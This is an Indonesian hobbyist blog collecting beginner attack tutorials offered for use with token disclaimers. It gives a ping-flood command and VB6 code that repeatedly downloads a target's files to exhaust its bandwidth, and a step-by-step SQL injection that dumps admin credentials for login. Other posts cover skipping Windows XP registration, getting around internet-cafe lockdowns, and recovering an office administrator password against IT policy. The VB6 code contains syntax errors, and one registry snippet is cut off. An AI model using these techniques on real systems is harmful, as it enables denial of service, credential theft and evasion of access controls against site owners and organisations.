Nahwan Erlingga Blogs

Teknik DOS disini maksudnya yaitu untuk melumpuhkan suatu server/website dengan cara menghabiskan bandwitdh dari website tersebut. Ada beberapa cara untuk DDOS, misalnya paling gampang dengan menggunakan perintah "ping", misalnya seperti : "ping -l 65500 - t www.target.com". Dari perintah "ping" tersebut kita mengirim paket sebesar 65500 bytes ke server dan nilai tersebut merupakan nilai maksimum yang dapat kita kirim. Meskipun perintah tersebut menggunakan paramameter "-t" yang berarti perintah "ping" akan dilakukan terus menerus ke "www.target.com", tetapi sepertinya butuh ratusan/ribuan komputer yang diperlukan untuk menjalani perintah "ping" ini seharian sehingga bandwidth dari si server habis.

Oleh karena hanya "65500", maka saya mikir bagaimana ya cara cepat menyedot bandwitdh dari si server. Berhubung perintah "ping" ga bisa, saya coba liat2 VB6, yup ada perintah : "Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long".

Setelah mencoba2, perintah tersebut dapat mendownload satu halaman/file dan mengsave file tsb ke harddisk. Wah klo file yang berukuran gede didownload make looping kayaknya bakalan nyedot bandwidth si server banyak tuh

Dengan konsep tersebut, yuk mari yuk mulai coding make VB6.. pake apa aja bisa kok soalnya kodenya sederhana

Yang diperlukan :
- l textBox => Text1
- 2 button, => Command1 dan Command2
- 1 timer => Timer1
- tambah sendiri yang lain

Kode-kode (taruh di form):

'----------START----------START----------
'fungsi buat mendownload file
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
'fungsi untuk mendapatkan folder temporary
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

'Saat program dijalankan make sure nothing happen
Private Sub Form_Load()
Timer1.Enabled = False
End Sub

'fungsi untuk menggenerate tulisan menjadi acak
Public Function Random(ByVal Low As Long, ByVal High As Long) As Long
Randomize
Random = Int((High - Low + 1) * Rnd) + Low
End Function

'fungsi untuk mendapatkan folder temporary
Public Function GetTempDir() As String
Dim buff As String
buff = String(255, Chr$(0))
GetTempPath Len(buff), buff
GetTempDir = Left(buff, InStr(1, buff, Chr(0), vbTextCompare) - 1)
End Function

'inti dari program untuk melakukan DDOS
Private Sub Timer1_Timer()
Dim fileName As String
Dim DDOS
'membuat nama acak sebagai nama file yang akan disave
fileName = GetTempDir & Random(0, 999999999)
'mulai mendownload file yang terdapat pada Text1 dan mengsavenya
DDOS = URLDownloadToFile(0, Text1.text, fileName 0, 0)

'tombol untuk memulai DDOS
Private Sub Command1_Click()
Timer1.Enabled = True 'hidupkan timer buat looping
Timer1.Interval = 1000 'set setiap 1 detik program mendownload file dari server
Command2.Enabled = True
Command1.Enabled = False
End Sub

'stop semua actions
Private Sub Command2_Click()
Timer1.Enabled = False
Command1.Enabled = True
Command2.Enabled = False
End Sub
'----------END----------END----------

Setelah semua komponen2 dan kode sudah ada maka jalankan / F5, kemudian isi textbox dengan website yang akan diDDOS, misalnya "http://target.com/download/setup.exe" atau "http://target.com/index.php" , ingat tanpa tanda kutip dan TIDAK pake "www". Jadi klo kita isi "www.target.com/index.php" <== SALAH!. Setelah itu pencet command1 untuk memulai serangan.

Saat command1 dipencet, maka program otomatis mendownload file di website sesuai yang kita isi di textbox dan mengsavenya di folder temporay dengan nama acak. Kenapa pake nama acak? karena untuk mengantisipasi jika suatu file blum beres didownload maka ga akan ngeganggu proses lain yang sedang berlangsung.

Ok kayaknya udah pada paham tentang source code di atas. Ya tentunya bisa nambahin sendiri seperti pengecekan ada tidaknya koneksi internet, size yang udah didonlot atau animasi loading pada program biar lebih ok lagi programnya.

perhatian :
Right, jangan digunaiin sembarangan..

Setiap perbuatan ada balasannya dan ingat gunakan di komputer yang bandwidthnya unlimited.

Semuanya berawal karena saya ngeliat-liat semuanya pada rame masalah web attack...
Dalam hati saya hanya bisa berkata "yaahhh.. ane kagak ngarti ^^"
Akhirnya saya liat-liat, baca-baca dan coba-coba tentunya, langsung dah dengan PD-nya nulis artikel kayak gini...

saya cuma mau sharing atau berbagi dari apa yang saya tau dan dapet. Sekarang saya akan menjelaskan bagaimana cara melakukan SQL Injection versi Pemula tentunya. Untuk yang dah jago banget diharapkan untuk tidak membaca. hhe ^^
hhe. ^^ Becanda koq, yang master dimohon tanggapannya supaya kalo ada kesalahan atau apapun itu saya bisa mengkoreksinya.. maklum newbiee.. ^^

ok deh langsung aja.. ^^

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya.. Tinggal login.. Cari yang asik, terus.. Terserah Anda..

perhatian :
"Selamat mencoba ^^ dan ingat segala sesuatu yang kita perbuat, akibatnya kita sendiri yang menanggungnya,jadi jangan sembarang ok !! ;) "

Mungkin anda pernah kesal, kalau anda ke warnet banyak fasilitas yang dikunci dan dihilangkan seperti Regedit, Run, Find, Klik kanan, Display properties, Control Panel, bahkan untuk masuk ke Dosprompt, semua itu tidak lain dan tidak bukan diantaranya adalah program security WinBoost 2001 yaitu security buat sistem windows yang bisa memproteksi semua sistemnya diantaranya seperti tersebut diatas dan masih banyak lagi, dengan tujuan menutup bugs - bugs yang ada di windows juga agar virus aplikasi 32 bit tidak bisa masuk contohnya Cih, makanya fasilitas dosprompt dikunci, yang lain lagi agar billing warnet tidak gampang kebobolan oleh para hacker tapi ada jalan menuju roma. hhe^^

Gambar diatas adalah program WinBoost yang apabila di jalankan dia akan meminta password yang telah diisi oleh pemilik warnetnya , apabila tidak ada passwordnya, kita tidak akan bisa masuk.

mmhh.. kita tau Microsoft Windows XP telah banyak di minati banyak orang.. dan waktu itu saya masih memakai Windows 98 (hahahaha.. tua bgd ^^) seingat saya pas pertama baru baru Microsoft Windows XP di rilis pengguna Windows XP diharuskan melakukan registrasi dalam waktu 30 hari, atau sistem operasi tersebut tidak dapat di gunakan, iiaa kan..?!,iaa donk..?!,hhe ^^ (bercanda dikit biar gk tegang) dan akhirnya.. setelah saya membaca buku cara cara bermain dengan registry,saya temukan cara melakukan registration skip pada Windows XP, yg ada perlukan cuma registry editor ( regedit.exe )

oke deh langsung aja_

langkah langkahnya sebagai berikut :
1. putuskan semua koneksi internet ( network cable / Dial up )..etc..
2. nyalakan komputer
3. klik Start, Run , ketik regedit.exe
4. lalu ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion
5. klik kanan di "RegDone" String [REG_SZ] Value -> pilih modify -> ketik 1 di box Value -> klik ok atau tekan Enter -> keluar dari registry
7. Klik kanan di Icon Internet Explorer -> buka Tools Menu -> klik Internet Options -> pilih default homepage ke Address mana saja ASAL JGN ADDRESS Microsoft or MSN web page
8. Restart PC
9: DONE ! horeee !!!,,hhe ^^


perhatian :

Backup dulu registry anda sebelum melakukan perubahan apa pun, bukan tanggung jawab saya bila Windows XP anda rusak atau BLUE SCREEN ~ ok !!

Tulisan ini saya buat selaku seorang newbie ^^ , itupun akibat kejengkelan dengan salah satu warnet di deket rumah saya. Semua fasilitas direstric, mulai dari regedit, menu file, run, bahkan floppy A-nya pun di ambil.. huuuhh..
Mana bisa tenang user pemakainya kalo begini-begini terus keadaannya. huftt. Jadi sorry-sorry aja kalo anda merasa yang udah senior menerima tutorial ini. Jujur, saya adalah seorang newbie, newbie yang imut dan lucu, hhe. ^^ hhaa. PD bgd aq ^^


ok deh langsung aja ^^

Sering enggak pergi ke warnet, lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas find yang ada di warnet dicomot, mau gunain dos eh dimatiin trus runnya diculik... ih... kesel enggak dengan warnet kayak gini. Saya sih kesel buangeet, tapi untung aja yang jaga warnetnya sediikit cakep jadi ya... hehehe... tau sendiri lah!.

Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan code berikut ini ke text-editor kalian:
----------------------------[ cut here the code ]------------------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet

Sekarang klik start lalu run dan ketikkan regedit. Zup... regedit yang manis terbuka dan lakukan apa yang ingin anda lakukan... saran aja, rubah aja RegisterOwner dan Organization dengan nama anda, bukan apa-apa... biasa, pingin terkenal, hehehehe..

Memang hidup dijaman sekarang yang sulit semakin sulit bila setiap keinginan kita untuk “berkembang” dikekang. Bagi karyawan perkantoran yang menggunakan komputer dengan OS Windows XP akan makin terkekang kebebasannya karena komputer hanya bisa digunakan hanya untuk kerja dan kerja.

Memang ini merupakan IT policy setiap kantor yang tidak memperbolehkan untuk menginstall bermacam2 program tapi hal inilah yang membuat para karyawan sulit untuk berkembang. Memang harus diakui ada sisi baik dan ada juga sisi buruk dari penerapan IT Policy.

Tapi kali ini kita sedikit mengabaikan sisi baik dari IT policy tersebut dan lebih mensupport para karyawan untuk bisa berkembang.

Artikel ini sedikit memberi gambaran bahwa setiap ada kesulitan pasti ada jalan keluar.

Di dunia maya ini banyak sekali artikel yang membahas tentang cara membongkar password administrator Windows XP bahkan sudah banyak program yang dibuat untuk mereset ataupun mengganti password tersebut. Tentunya jika kita ingin bermain manis, kita tidak perlu melakukan cara-cara kasar tersebut karena resiko yang kita ambil akan lebih besar. Cara yang digunakan untuk menemukan password administartor sangat simple dan tidak perlu banyak pengetahuan yang dibutuhkan hanya tinggal mengikuti langkah dibawah ini :

Keperluan yang dibutuhkan untuk mengetahui password administrator antara lain 1 buah disket, akses internet dan email :

1. langkah pertama adalah mendownload file image.exe dari http://www.loginrecovery.com/referal.php?p=2
2. Buat bootable disk dengan menjalankan file tersebut
3. Matikan computer lalu boot dengan menggunakan disk tersebut. (disk tersebut akan menghasilkan satu buah file upload.txt)
4. Setelah itu masuk ke windows xp secara normal (sebelumnya keluarkan disket) lalu buka http://www.loginrecovery.com/instructions.php
5. Masukkan disket lalu pilih upload.txt, masukkan alamat email dan access code lalu klik submit.
6. Kita akan mendapatkan konfirmasi lewat email untuk mengetahui password kita telah selesai. Sebenarnya website ini sangat cepat sekali untuk menemukan password tetapi karena kita menggunakannya secara gratisan maka harus menunggu 48 jam (2 hari) untuk bisa melihat password administrator, kecuali kalau mau bayar, dimenit itu juga password bisa ketahuan.
7. Bila telah 48 jam (lama bener yah ..) buka http://www.loginrecovery.com/results.php , masukkan alamat email saat kita mengupload, klik view lalu masukkan access code and .. password administrator ditemukan

Memang segala sesuatu tidak ada yang sempurna tetapis situs ini mengklaim keberhasilan menemukan password diatas 98.5% hebat bukan …

Selamat mencoba dan ingat segala sesuatu yang kita perbuat, akibatnya kita sendiri yang mananggungnya,jadi jangan sembarang

sumber : jasakom
oleh : NeEkatT

Memang tidak mungkin melihat sebiji virus atau bakteri hanya dengan mata telanjang. Mungkin itulah sebabnya mengapa di zaman Fir'aun belum dikenal istilah virus ataupun bakteri. Tetapi dengan ditemukannya mikroskop, makhluk-makhluk mikroskopis yang kerap kali menyusahkan manusia tersebut berhasil dilihat, ditelanjangi, dan dianalisis secara detail. Kesimpulannya, apa yang dapat kita lihat sangat bergantung pada perlengkapan (instrumen) apa yang kita gunakan.

Tidak berbeda jauh dengan dunia nyata, dalam dunia komputer pun hukum dasar itu tetap berlaku. Dengan peralatan (baca: software) yang berbeda, kita akan melihat file/folder yang berbeda pula. Sebagai contoh jika menggunakan tools bawaan windows yakni windows explorer untuk menjelajahi isi hard disk, pada kondisi defaultnya kita tidak akan dapat melihat file-file dan folder yang diset beratribut hidden dan system, kecuali jika kita sedikit melakukan perubahan setting pada folder option atau di registrynya.